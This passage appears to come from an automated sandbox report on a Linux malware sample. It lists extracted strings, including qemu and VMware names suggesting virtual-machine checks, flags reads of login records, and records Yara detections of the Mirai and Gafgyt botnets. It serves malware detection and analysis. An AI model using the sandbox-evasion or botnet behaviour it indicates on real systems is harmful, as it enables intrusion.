Source: 5239.20.dr Binary or memory string: qemu-microblazeel
Source: 5239.20.dr Binary or memory string: \qemu
Source: 5239.20.dr Binary or memory string: qemu-xtensaeb
Source: 5239.20.dr Binary or memory string: qemu-mipsn32el
Source: 5239.20.dr Binary or memory string: SAqemu
Source: 5239.20.dr Binary or memory string: Vqemu
Source: 5239.20.dr Binary or memory string: qemu-mipsn32
Source: 5239.20.dr Binary or memory string: qemuAU
Source: 5239.20.dr Binary or memory string: qemu-riscv32
Source: 5239.20.dr Binary or memory string: qemu-sparc32plus
Source: 5239.20.dr Binary or memory string: 7,qemu
Source: 5239.20.dr Binary or memory string: qemu-s390x
Source: 5239.20.dr Binary or memory string: vmware-checkvm
Source: kern.log.300.dr Binary or memory string: Jan 15 00:09:27 galassia kernel: [ 575.026119] Modules linked in: monitor(OE) md4 cmac cifs libarc4 fscache libdes vmw_vsock_vmci_transport vsock binfmt_misc dm_multipath scsi_dh_rdac scsi_dh_emc scsi_dh_alua vmw_balloon joydev input_leds serio_raw vmw_vmci sch_fq_codel drm parport_pc ppdev lp parport ip_tables x_tables autofs4 btrfs zstd_compress raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq libcrc32c raid1 raid0 multipath linear crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel crypto_simd cryptd glue_helper psmouse ahci mptspi vmxnet3 scsi_transport_spi mptscsih libahci mptbase
Source: 5239.20.dr Binary or memory string: qemu-nios2
Source: 5239.20.dr Binary or memory string: qemu-armeb
Source: 5239.20.dr Binary or memory string: -4415868968400A--gzVMware SVGA video driver
Source: 5239.20.dr Binary or memory string: 7xml::parser::style::streamXML::Parser::Style::Stream3pm315701248990A--gzStream style for XML::Parsersystemd-timedated-8816268940210B--gzTime and date bus mechanismxfce4-keyboard-settings-1115867081120A--gzKeyboard settings for Xfcepygettext2-1115841026830B--gzPython equivalent of xgettext(1)sudoedit-8816110660620B--gzexecute a command as another userintro7-7715812813670A--gzintroduction to overview and miscellany sectionsprof-1115812813670A--gzread and display shared object profiling datadhclient.conf-5516219398220A--gzDHCP client configuration filepam_group-8815953742440A--gzPAM module for group accesssystemd-ask-password-1116268940210A--gzQuery the user for a system passwordupdate-dictcommon-hunspell-8815422954860A--gzrebuild hunspell database and emacsen stuffqemu-nios2-1116261022170B--gzQEMU User Emulatorlwp::useragentLWP::UserAgent3pm315750405830A--gzWeb user agent classgpgcompose-1115838662460A--gzGenerate a stream of OpenPGP packetsecho-1115676799200A--gzdisplay a line of textio::socket::ssl::utilsIO::Socket::SSL::Utils3pm315817106800A--gz- loading, storing, creating certificates and keyscurl-1116268709580A--gztransfer a URLgetcap-8815819434600A--gzexamine file capabilitieszegrep-1115762517060B--gzsearch possibly compressed files for a regular expressiongrub-syslinux2cfg-1116214898500A--gztransform syslinux config into grub.cfgrtc-4415812813670A--gzreal-time clockglib::codegenGlib::CodeGen3pm315820097650A--gzcode generation utilities for Glib-based bindings.wpa_cli-8816146062790A--gzWPA command line clientiso_8859_3-7715812813670B--gzISO 8859-3 character set encoded in octal, decimal, and hexadecimaliso_8859-9-7715812813670A-tgzISO 8859-9 character set encoded in octal, decimal, and hexadecimallvextend-8815816289110A--gzAdd space to a logical volumeresolvectl-1116268940210A--gzResolve domain names, IPV4 and IPv6 addresses, DNS resource records, and services; introspect and reconfigure the DNS resolverchgrp-1115676799200A--gzchange group ownershipsystemd-cgls-1116268940210A--gzRecursively show control group contentspygettext3.8-1113852085880A--gzPython equivalent of xgettext(1)ping4-8815804258830B--gzsend ICMP ECHO_REQUEST to network hostsidmapwb-8816000845410A--gzwinbind ID mapping plugin for cifs-utilsapturl-gtk-8815799493830B--gzgraphical apt-protocol interpreting package installersane-epsonds-5516003468200A--gzSANE backend for EPSON ESC/I-2 scannersgvfs-monitor-file-1115868766090A--gzrstart-1115829564830A--gza sample implementation of a Remote Start clientgit-stage-1116148628880A--gzAdd file contents to the staging areatc-pedit-8815816145190A--gzgeneric packet editor actioniptables-save-881582899
Source: 5239.20.dr Binary or memory string: I_qemu
Source: 5239.20.dr Binary or memory string: -1116261022170B--gzQEMU User Emulator
Source: 5239.20.dr Binary or memory string: -3315837702310A--gzvmware shared library
Source: 5239.20.dr Binary or memory string: qemu-mips
Source: 5239.20.dr Binary or memory string: qemuj\
Source: 5239.20.dr Binary or memory string: {qemuQ&
Source: 5239.20.dr Binary or memory string: Wgnome-text-editor-111629209547491759146B--gztext editor for the GNOME Desktopx11::protocol::connection::filehandleX11::Protocol::Connection::FileHandle3pm314314075500A--gzPerl module base class for FileHandle-based X11 connectionshtbHTB8815816145190Ctc-htb-gzcifscreds-1116000845410A--gzmanage NTLM credentials in kernel keyringiwconfig-8815490049440A--gzconfigure a wireless network interfaceossl_store-file-7ssl716164130370A--gzThe store 'file' scheme loadertc-stab-8815816145190A--gzGeneric size table manipulationsnotifier-7715877390340A--gzcups notification interfaceqemu-arm-1116261022170B--gzQEMU User EmulatorgemfileGemfile5516263767190Cgemfile2.7-gzglib::object::subclassGlib::Object::Subclass3pm315820097650A--gzregister a perl class as a GObject classnetcat-111612200165426646725B--gzarbitrary TCP and UDP connections and listensdpkg::changelog::parseDpkg::Changelog::Parse3perl315849439740A--gzgeneric changelog parser for dpkg-parsechangelogmpris-proxy-1116243432320A--gzBluetooth mpris-proxybundle-pristine2.7-1116263767190A--gzRestores installed gems to their pristine conditionfsck.ext3-8815816604980B--gzcheck a Linux ext2/ext3/ext4 file systemvolname-1115625752510A--gzreturn volume nameiso-8859-9-7715812813670B--gzISO 8859-9 character set encoded in octal, decimal, and hexadecimalheadhead1HEAD1psd-4415812813670A--gzdriver for SCSI disk driveschrt-1115953177680A--gzmanipulate the real-time attributes of a processvcs-4415812813670A--gzvirtual console memorygit-upload-archive-1116148628880A--gzSend archive back to git-archivenet::dbus::binding::message::errorNet::DBus::Binding::Message::Error3pm315773746310A--gza message encoding a method call errorpkcs11.conf-5516097870510A--gzConfiguration files for PKCS#11 modulessfill-1115227593860A--gzsecure free disk and inode space wiper (secure_deletion toolkit)ldattach-8815953177680A--gzattach a line discipline to a serial linethin_restore-8815811608350A--gzrestore thin provisioning metadata file to device or file.phar.phar7.4-1116254980150B--gzPHAR (PHP archive) command line toolbundle-outdated2.7-1116263767190A--gzList installed gems with newer versions availablemail::addressMail::Address3pm315640244160A--gzparse mail addressesopenssl-ca-1ssl116164130370B--gzsample minimal CA applicationchardet3-1115765858900A--gzuniversal character encoding detectorerb2.7-1116263767190A--gzRuby Templatingchktrust-1115826667350A--gzCheck the trust of a PE executable.sg_raw-8815825816070A--gzsend arbitrary SCSI command to a devicegvfs-trash-1115868766090A--gzintro1-1115812813670A--gzintroduction to user commandsmailcap-5515714399500A--gzmetamail capabilities filegigoloGigolo1gig
Source: 5239.20.dr Binary or memory string: vmware-xferlogs

Language, Device and Operating System Detection:

barindex
Reads system files that contain records of logged in users
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5508) Logged in records file read: /var/log/wtmp Jump to behavior
Source: /usr/lib/accountsservice/accounts-daemon (PID: 5777) Logged in records file read: /var/log/wtmp
Source: /usr/lib/accountsservice/accounts-daemon (PID: 6013) Logged in records file read: /var/log/wtmp

Stealing of Sensitive Information:

barindex
Yara detected Mirai
Source: Yara match File source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Gafgyt
Source: Yara match File source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Mirai
Source: Yara match File source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: dump.pcap, type: PCAP
Yara detected Gafgyt
Source: Yara match File source: 5275.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5280.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5276.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5281.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5279.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
Source: Yara match File source: 5274.1.000000001a887bdc.00000000600e6b8d.r-x.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs